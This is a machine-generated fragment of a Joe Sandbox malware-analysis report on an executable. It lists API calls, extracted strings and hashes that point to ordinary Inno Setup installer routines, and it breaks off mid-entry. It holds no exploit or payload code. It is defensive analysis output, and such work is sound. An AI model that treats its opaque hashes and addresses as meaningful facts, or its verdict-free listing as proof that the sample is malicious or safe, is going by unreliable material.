                                                                                    • Opcode ID: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
                                                                                    • Instruction ID: f3027618da4b71ab9256091943579cea75a3e5d7718dd7814224cb4ba64d2bd0
                                                                                    • Opcode Fuzzy Hash: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
                                                                                    • Instruction Fuzzy Hash: 4D21A4767017146FD3109668DC81F3B37A9EB84B14F98453AF984DB382EA78EC048B99
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(00498A68,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AC2
                                                                                    • CoCreateInstance.OLE32(00498764,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AE8
                                                                                    • SysFreeString.OLEAUT32(?), ref: 00455C47
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInstance$FreeString
                                                                                    • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue$IShellLink::QueryInterface
                                                                                    • API String ID: 308859552-2052886881
                                                                                    • Opcode ID: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
                                                                                    • Instruction ID: 75ae484d58e3d3074f9f089aff153db97feeda1b73ba6cb4122c168b6c8c5e36
                                                                                    • Opcode Fuzzy Hash: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
                                                                                    • Instruction Fuzzy Hash: 76915171A00604AFDB40DFA9C895BAE77F8AF09305F14446AF904EB262DB78DD08CB59
                                                                                    APIs
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045851B,?,00000000,0045857E,?,?,02193858,00000000), ref: 00458399
                                                                                    • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02193858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 004583F6
                                                                                    • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02193858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 00458403
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0045844F
                                                                                    • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02193858,?,00000000,004584B0,?,00000000), ref: 00458475
                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02193858,?,00000000,004584B0,?,00000000), ref: 0045847C
                                                                                      • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                    • String ID: CreateEvent$TransactNamedPipe
                                                                                    • API String ID: 2182916169-3012584893
                                                                                    • Opcode ID: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
                                                                                    • Instruction ID: 22acba0fcf61382a58efe17371b9c4a56388ad6b02d4dd4833f4e79bb834958c
                                                                                    • Opcode Fuzzy Hash: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
                                                                                    • Instruction Fuzzy Hash: 8641A475A00608AFDB15DF95CD81F9EB7F8FB49714F1040AAF904F7292DA789E44CA28
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0045607D,?,?,00000031,?), ref: 00455F40
                                                                                    • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00455F46
                                                                                    • LoadTypeLib.OLEAUT32(00000000,?), ref: 00455F93
                                                                                      • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                    • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                    • API String ID: 1914119943-2711329623
                                                                                    • Opcode ID: 789ee19f92c60064ad7d583355d3075d4ba7a51ebd8b6007120108efd0616a1c
                                                                                    • Instruction ID: 464ca0410b994955771bbd6b79a2bac712fdb799e88c0b9d306e26cdd2de6b74
                                                                                    • Opcode Fuzzy Hash: 789ee19f92c60064ad7d583355d3075d4ba7a51ebd8b6007120108efd0616a1c
                                                                                    • Instruction Fuzzy Hash: 2231C471B00604AFCB10EFAACD51E5BB7BEEB89B11B518466FC04D3292DA78DD05C768
                                                                                    APIs
                                                                                    • RectVisible.GDI32(?,?), ref: 00416E23
                                                                                    • SaveDC.GDI32(?), ref: 00416E37
                                                                                    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
                                                                                    • RestoreDC.GDI32(?,?), ref: 00416E75
                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00416EF5
                                                                                    • FrameRect.USER32(?,?,?), ref: 00416F28
                                                                                    • DeleteObject.GDI32(?), ref: 00416F32
                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00416F42
                                                                                    • FrameRect.USER32(?,?,?), ref: 00416F75
                                                                                    • DeleteObject.GDI32(?), ref: 00416F7F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                    • String ID:
                                                                                    • API String ID: 375863564-0
                                                                                    • Opcode ID: 64b03b7e0dfbfe231859d70345d3e0f57f9c7ec518debabf741e30dcc0fb8ff1
                                                                                    • Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
                                                                                    • Opcode Fuzzy Hash: 64b03b7e0dfbfe231859d70345d3e0f57f9c7ec518debabf741e30dcc0fb8ff1
                                                                                    • Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                    • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                    • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                    • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                    • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                    • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                    • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                    • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                    • String ID:
                                                                                    • API String ID: 1694776339-0
                                                                                    • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                    • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                    • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                    • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                    APIs
                                                                                    • GetSystemMenu.USER32(00000000,00000000), ref: 00422243
                                                                                    • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
                                                                                    • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
                                                                                    • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
                                                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
                                                                                    • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
                                                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
                                                                                    • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
                                                                                    • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
                                                                                    • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Delete$EnableItem$System
                                                                                    • String ID:
                                                                                    • API String ID: 3985193851-0
                                                                                    • Opcode ID: 02d38efaefe46f0e9bc3abe3cfd80dc8f7ad5e6e4bcf4392d2612e5af0a0388e
                                                                                    • Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
                                                                                    • Opcode Fuzzy Hash: 02d38efaefe46f0e9bc3abe3cfd80dc8f7ad5e6e4bcf4392d2612e5af0a0388e
                                                                                    • Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C
                                                                                    APIs
                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfileStringWrite
                                                                                    • String ID: $pI$.tmp$MoveFileEx$NUL$WININIT.INI$[rename]$oI
                                                                                    • API String ID: 390214022-3415521383
                                                                                    • Opcode ID: 4cfdaec4cf45cb6b31dd2cede704c04f2930a939beeeeed92986428e7fe6f80d
                                                                                    • Instruction ID: ce58c644a57a5931bfb3eb4b41fd184989c95ed3aef939848703120becc63cdc
                                                                                    • Opcode Fuzzy Hash: 4cfdaec4cf45cb6b31dd2cede704c04f2930a939beeeeed92986428e7fe6f80d
                                                                                    • Instruction Fuzzy Hash: 22910734E0010DABDB11EFA5C852BDEB7B5EF49346F508467E800B7392D778AE498B58
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(10000000), ref: 0047FFC4
                                                                                    • FreeLibrary.KERNEL32(02470000), ref: 0047FFD8
                                                                                    • SendNotifyMessageA.USER32(00010480,00000496,00002710,00000000), ref: 0048004A
                                                                                    Strings
                                                                                    • Not restarting Windows because Setup is being run from the debugger., xrefs: 0047FFF9
                                                                                    • GetCustomSetupExitCode, xrefs: 0047FE79
                                                                                    • Restarting Windows., xrefs: 00480025
                                                                                    • DeinitializeSetup, xrefs: 0047FED5
                                                                                    • Deinitializing Setup., xrefs: 0047FE3A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary$MessageNotifySend
                                                                                    • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                    • API String ID: 3817813901-1884538726
                                                                                    • Opcode ID: 3e65ccf6202abbdfd793ce9802210bad3c829859d96f97b0f1010f0964bcdbc0
                                                                                    • Instruction ID: a364eb3419ca1f30a9e3eb44d73b76d56ae546640220791ead322ba595580ec3
                                                                                    • Opcode Fuzzy Hash: 3e65ccf6202abbdfd793ce9802210bad3c829859d96f97b0f1010f0964bcdbc0
                                                                                    • Instruction Fuzzy Hash: C351A1316002009FD721EB69F945B5A7BE4EB1A314F51847BF805C73A2DB389848CB99
                                                                                    APIs
                                                                                    • SHGetMalloc.SHELL32(?), ref: 00460DEF
                                                                                    • GetActiveWindow.USER32 ref: 00460E53
                                                                                    • CoInitialize.OLE32(00000000), ref: 00460E67
                                                                                    • SHBrowseForFolder.SHELL32(?), ref: 00460E7E
                                                                                    • CoUninitialize.OLE32(00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460E93
                                                                                    • SetActiveWindow.USER32(?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EA9
                                                                                    • SetActiveWindow.USER32(?,?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EB2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                    • String ID: A
                                                                                    • API String ID: 2684663990-3554254475
                                                                                    • Opcode ID: 2477b1493d95c66d93d73e99a730f240e77ae973ab02a92069b792ba0dab2901
                                                                                    • Instruction ID: e80b4c5213709972e599e89028d95aa00c835143d3680f9f001b64d6594dadc3
                                                                                    • Opcode Fuzzy Hash: 2477b1493d95c66d93d73e99a730f240e77ae973ab02a92069b792ba0dab2901
                                                                                    • Instruction Fuzzy Hash: 8C3130B0D00218AFDB01EFB6D885A9EBBF8EB09304F51447AF914F7251E7789A04CB59
                                                                                    APIs
                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5,?,?,00000000,00471F1C), ref: 004719BC
                                                                                      • Part of subcall function 0042CD60: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CDD6
                                                                                      • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5), ref: 00471A33
                                                                                    • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000), ref: 00471A39
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                    • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                    • API String ID: 884541143-1710247218
                                                                                    • Opcode ID: 166f044b85d341f0b6ee90afdeb19f2146d980d02c7b22180f5b46b241ce676d
                                                                                    • Instruction ID: 88fb20351202849850a9607c8ed9a5972d7e7c37514b441dc4b5c3053575b9e2
                                                                                    • Opcode Fuzzy Hash: 166f044b85d341f0b6ee90afdeb19f2146d980d02c7b22180f5b46b241ce676d
                                                                                    • Instruction Fuzzy Hash: 8111E2307005147BD711EA6ECC82B9E73ACDB45714FA1813BB405B72E1DB3C9E02865C
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(02470000,inflateInit_), ref: 0045C9DD
                                                                                    • GetProcAddress.KERNEL32(02470000,inflate), ref: 0045C9ED
                                                                                    • GetProcAddress.KERNEL32(02470000,inflateEnd), ref: 0045C9FD
                                                                                    • GetProcAddress.KERNEL32(02470000,inflateReset), ref: 0045CA0D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                    • API String ID: 190572456-3516654456
                                                                                    • Opcode ID: 311722acbfa37a17bdf68912e4e87f1f7738553d6cb20796f4da0de6e3995170
                                                                                    • Instruction ID: ca09fd674ca76a7276795bdcbb2c408d45c762c24a12309d3e7b68c52f970bbc
                                                                                    • Opcode Fuzzy Hash: 311722acbfa37a17bdf68912e4e87f1f7738553d6cb20796f4da0de6e3995170
                                                                                    • Instruction Fuzzy Hash: A7011AB0901304DEEB14DF36BEC97273AA5E760B56F14D03B9C55992A2D7780848CB9C
                                                                                    APIs
                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0041A9C9
                                                                                    • 73A14D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
                                                                                    • SetBkColor.GDI32(?,?), ref: 0041AA18
                                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
                                                                                    • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
                                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
                                                                                    • SetBkColor.GDI32(00000000,?), ref: 0041AAD3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$StretchText
                                                                                    • String ID:
                                                                                    • API String ID: 2984075790-0
                                                                                    • Opcode ID: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
                                                                                    • Instruction ID: 2bdc14f7f78cb6bf094045e191087cf2cdbf471e5afceb3518b79a0be2d35765
                                                                                    • Opcode Fuzzy Hash: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
                                                                                    • Instruction Fuzzy Hash: 4E61E5B5A00105EFCB40EFADD985E9AB7F8AF08354B10816AF508DB261CB34ED44CF68
                                                                                    APIs
                                                                                      • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                    • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00457470,?, /s ",?,regsvr32.exe",?,00457470), ref: 004573E2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseDirectoryHandleSystem
                                                                                    • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                    • API String ID: 2051275411-1862435767
                                                                                    • Opcode ID: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
                                                                                    • Instruction ID: cb1a7ae3e697987e935249ccafc7b98f7c309c2d79f12e82178ec20c33fcefbe
